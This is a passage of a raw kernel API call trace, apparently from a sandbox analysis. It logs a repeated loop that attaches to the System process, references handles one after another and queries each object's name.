KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.373] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ea0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3b3850, HandleInformation=0x0) returned 0x0 [0289.373] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.373] PsReleaseProcessExitSynchronization () returned 0x2 [0289.373] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f832 [0289.373] ObQueryNameString (in: Object=0xffffe0006a3b3850, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.373] ObfDereferenceObject (Object=0xffffe0006a3b3850) returned 0x7fff [0289.373] IoCompleteRequest () returned 0x0 [0289.373] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.373] PsAcquireProcessExitSynchronization () returned 0x0 [0289.373] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.373] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7847c0, HandleInformation=0x0) returned 0x0 [0289.373] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.373] PsReleaseProcessExitSynchronization () returned 0x2 [0289.373] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f831 [0289.373] ObQueryNameString (in: Object=0xffffe0006a7847c0, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.373] ObfDereferenceObject (Object=0xffffe0006a7847c0) returned 0x7fff [0289.373] IoCompleteRequest () returned 0x0 [0289.373] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.373] PsAcquireProcessExitSynchronization () returned 0x0 [0289.373] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a89c4e0, HandleInformation=0x0) returned 0x0 [0289.374] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.374] PsReleaseProcessExitSynchronization () returned 0x2 [0289.374] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f830 [0289.374] ObQueryNameString (in: Object=0xffffe0006a89c4e0, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.374] ObfDereferenceObject (Object=0xffffe0006a89c4e0) returned 0x7fff [0289.374] IoCompleteRequest () returned 0x0 [0289.374] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.374] PsAcquireProcessExitSynchronization () returned 0x0 [0289.374] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a070230, HandleInformation=0x0) returned 0x0 [0289.374] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.374] PsReleaseProcessExitSynchronization () returned 0x2 [0289.374] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82f [0289.374] ObQueryNameString (in: Object=0xffffe0006a070230, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.374] ObfDereferenceObject (Object=0xffffe0006a070230) returned 0x7fff [0289.374] IoCompleteRequest () returned 0x0 [0289.374] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.374] PsAcquireProcessExitSynchronization () returned 0x0 [0289.374] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ec4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695188b0, HandleInformation=0x0) returned 0x0 [0289.374] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.374] PsReleaseProcessExitSynchronization () returned 0x2 [0289.374] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82e [0289.374] ObQueryNameString (in: Object=0xffffe000695188b0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.374] ObfDereferenceObject (Object=0xffffe000695188b0) returned 0x7fff [0289.374] IoCompleteRequest () returned 0x0 [0289.374] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.374] PsAcquireProcessExitSynchronization () returned 0x0 [0289.374] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ed8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007c7bc980, HandleInformation=0x0) returned 0x0 [0289.374] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.374] PsReleaseProcessExitSynchronization () returned 0x2 [0289.374] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82d [0289.374] ObQueryNameString (in: Object=0xffffe0007c7bc980, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.374] ObfDereferenceObject (Object=0xffffe0007c7bc980) returned 0x7fff [0289.374] IoCompleteRequest () returned 0x0 [0289.374] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.374] PsAcquireProcessExitSynchronization () returned 0x0 [0289.374] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ee0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a722300, HandleInformation=0x0) returned 0x0 [0289.374] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.375] PsReleaseProcessExitSynchronization () returned 0x2 [0289.375] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82c [0289.375] ObQueryNameString (in: Object=0xffffe0006a722300, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.375] ObfDereferenceObject (Object=0xffffe0006a722300) returned 0x7fff [0289.375] IoCompleteRequest () returned 0x0 [0289.375] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.375] PsAcquireProcessExitSynchronization () returned 0x0 [0289.375] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.375] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ee4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a778600, HandleInformation=0x0) returned 0x0 [0289.375] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.375] PsReleaseProcessExitSynchronization () returned 0x2 [0289.375] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82b [0289.375] ObQueryNameString (in: Object=0xffffe0006a778600, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.375] ObfDereferenceObject (Object=0xffffe0006a778600) returned 0x7fff [0289.375] IoCompleteRequest () returned 0x0 [0289.375] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.375] PsAcquireProcessExitSynchronization () returned 0x0 [0289.375] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.375] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ef0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3707d0, HandleInformation=0x0) returned 0x0 [0289.375] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.375] PsReleaseProcessExitSynchronization () returned 0x2 [0289.375] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f82a [0289.375] ObQueryNameString (in: Object=0xffffe0006a3707d0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.375] ObfDereferenceObject (Object=0xffffe0006a3707d0) returned 0x7fff [0289.375] IoCompleteRequest () returned 0x0 [0289.375] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.375] PsAcquireProcessExitSynchronization () returned 0x0 [0289.375] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.375] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f00, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a8ef280, HandleInformation=0x0) returned 0x0 [0289.375] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.375] PsReleaseProcessExitSynchronization () returned 0x2 [0289.375] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f829 [0289.375] ObQueryNameString (in: Object=0xffffe0006a8ef280, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.375] ObfDereferenceObject (Object=0xffffe0006a8ef280) returned 0x7fff [0289.375] IoCompleteRequest () returned 0x0 [0289.375] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.375] PsAcquireProcessExitSynchronization () returned 0x0 [0289.375] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.375] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a67f3e0, HandleInformation=0x0) returned 0x0 [0289.375] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.375] PsReleaseProcessExitSynchronization () returned 0x2 [0289.375] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f828 [0289.375] ObQueryNameString (in: Object=0xffffe0006a67f3e0, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.375] ObfDereferenceObject (Object=0xffffe0006a67f3e0) returned 0x7fff [0289.376] IoCompleteRequest () returned 0x0 [0289.376] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.376] PsAcquireProcessExitSynchronization () returned 0x0 [0289.376] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.376] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ff0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a644270, HandleInformation=0x0) returned 0x0 [0289.376] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.376] PsReleaseProcessExitSynchronization () returned 0x2 [0289.376] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f827 [0289.376] ObQueryNameString (in: Object=0xffffe0006a644270, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.376] ObfDereferenceObject (Object=0xffffe0006a644270) returned 0x7fff [0289.376] IoCompleteRequest () returned 0x0 [0289.376] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.376] PsAcquireProcessExitSynchronization () returned 0x0 [0289.376] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.376] ObReferenceObjectByHandle (in: Handle=0xffffffff80001038, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3f3870, HandleInformation=0x0) returned 0x0 [0289.376] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.376] PsReleaseProcessExitSynchronization () returned 0x2 [0289.376] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f826 [0289.376] ObQueryNameString (in: Object=0xffffe0006a3f3870, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.376] ObfDereferenceObject (Object=0xffffe0006a3f3870) returned 0x7fff [0289.376] IoCompleteRequest () returned 0x0 [0289.376] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.376] PsAcquireProcessExitSynchronization () returned 0x0 [0289.376] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.376] ObReferenceObjectByHandle (in: Handle=0xffffffff80001094, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007d5b0390, HandleInformation=0x0) returned 0x0 [0289.376] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.376] PsReleaseProcessExitSynchronization () returned 0x2 [0289.376] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f825 [0289.376] ObQueryNameString (in: Object=0xffffe0007d5b0390, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.376] ObfDereferenceObject (Object=0xffffe0007d5b0390) returned 0x7fff [0289.376] IoCompleteRequest () returned 0x0 [0289.376] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.376] PsAcquireProcessExitSynchronization () returned 0x0 [0289.376] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.376] ObReferenceObjectByHandle (in: Handle=0xffffffff8000115c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6ab410, HandleInformation=0x0) returned 0x0 [0289.376] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.376] PsReleaseProcessExitSynchronization () returned 0x2 [0289.376] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f824 [0289.376] ObQueryNameString (in: Object=0xffffe0006a6ab410, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.376] ObfDereferenceObject (Object=0xffffe0006a6ab410) returned 0x7fff [0289.376] IoCompleteRequest () returned 0x0 [0289.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.377] PsAcquireProcessExitSynchronization () returned 0x0 [0289.377] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.377] ObReferenceObjectByHandle (in: Handle=0xffffffff80001160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695425f0, HandleInformation=0x0) returned 0x0 [0289.377] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.377] PsReleaseProcessExitSynchronization () returned 0x2 [0289.377] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f823 [0289.377] ObQueryNameString (in: Object=0xffffe000695425f0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.377] ObfDereferenceObject (Object=0xffffe000695425f0) returned 0x7fff [0289.377] IoCompleteRequest () returned 0x0 [0289.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.377] PsAcquireProcessExitSynchronization () returned 0x0 [0289.377] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.377] ObReferenceObjectByHandle (in: Handle=0xffffffff800011c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a369410, HandleInformation=0x0) returned 0x0 [0289.377] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.377] PsReleaseProcessExitSynchronization () returned 0x2 [0289.377] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f822 [0289.377] ObQueryNameString (in: Object=0xffffe0006a369410, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.377] ObfDereferenceObject (Object=0xffffe0006a369410) returned 0x7fff [0289.377] IoCompleteRequest () returned 0x0 [0289.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.377] PsAcquireProcessExitSynchronization () returned 0x0 [0289.377] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.377] ObReferenceObjectByHandle (in: Handle=0xffffffff8000124c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a565480, HandleInformation=0x0) returned 0x0 [0289.377] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.377] PsReleaseProcessExitSynchronization () returned 0x2 [0289.377] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f821 [0289.377] ObQueryNameString (in: Object=0xffffe0006a565480, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.377] ObfDereferenceObject (Object=0xffffe0006a565480) returned 0x7fff [0289.377] IoCompleteRequest () returned 0x0 [0289.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.377] PsAcquireProcessExitSynchronization () returned 0x0 [0289.377] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.377] ObReferenceObjectByHandle (in: Handle=0xffffffff80001268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a679e50, HandleInformation=0x0) returned 0x0 [0289.377] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.377] PsReleaseProcessExitSynchronization () returned 0x2 [0289.377] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f820 [0289.377] ObQueryNameString (in: Object=0xffffe0006a679e50, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.377] ObfDereferenceObject (Object=0xffffe0006a679e50) returned 0x7fff [0289.377] IoCompleteRequest () returned 0x0 [0289.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.377] PsAcquireProcessExitSynchronization () returned 0x0 [0289.377] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.377] ObReferenceObjectByHandle (in: Handle=0xffffffff80001294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a33c280, HandleInformation=0x0) returned 0x0 [0289.378] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.378] PsReleaseProcessExitSynchronization () returned 0x2 [0289.378] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81f [0289.378] ObQueryNameString (in: Object=0xffffe0006a33c280, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.378] ObfDereferenceObject (Object=0xffffe0006a33c280) returned 0x7fff [0289.378] IoCompleteRequest () returned 0x0 [0289.378] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.378] PsAcquireProcessExitSynchronization () returned 0x0 [0289.378] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.378] ObReferenceObjectByHandle (in: Handle=0xffffffff800012ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069860460, HandleInformation=0x0) returned 0x0 [0289.378] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.378] PsReleaseProcessExitSynchronization () returned 0x2 [0289.378] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81e [0289.378] ObQueryNameString (in: Object=0xffffe00069860460, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.378] ObfDereferenceObject (Object=0xffffe00069860460) returned 0x7fff [0289.378] IoCompleteRequest () returned 0x0 [0289.378] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.378] PsAcquireProcessExitSynchronization () returned 0x0 [0289.378] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.378] ObReferenceObjectByHandle (in: Handle=0xffffffff800012f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6a0070, HandleInformation=0x0) returned 0x0 [0289.378] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.378] PsReleaseProcessExitSynchronization () returned 0x2 [0289.378] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81d [0289.378] ObQueryNameString (in: Object=0xffffe0006a6a0070, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.378] ObfDereferenceObject (Object=0xffffe0006a6a0070) returned 0x7fff [0289.378] IoCompleteRequest () returned 0x0 [0289.378] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.378] PsAcquireProcessExitSynchronization () returned 0x0 [0289.378] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.378] ObReferenceObjectByHandle (in: Handle=0xffffffff8000131c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c33a0, HandleInformation=0x0) returned 0x0 [0289.378] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.378] PsReleaseProcessExitSynchronization () returned 0x2 [0289.378] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f81c [0289.378] ObQueryNameString (in: Object=0xffffe0006a4c33a0, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.378] ObfDereferenceObject (Object=0xffffe0006a4c33a0) returned 0x7fff [0289.378] IoCompleteRequest () returned 0x0 [0289.378] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.378] PsAcquireProcessExitSynchronization () returned 0x0 [0289.378] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.378] ObReferenceObjectByHandle (in: 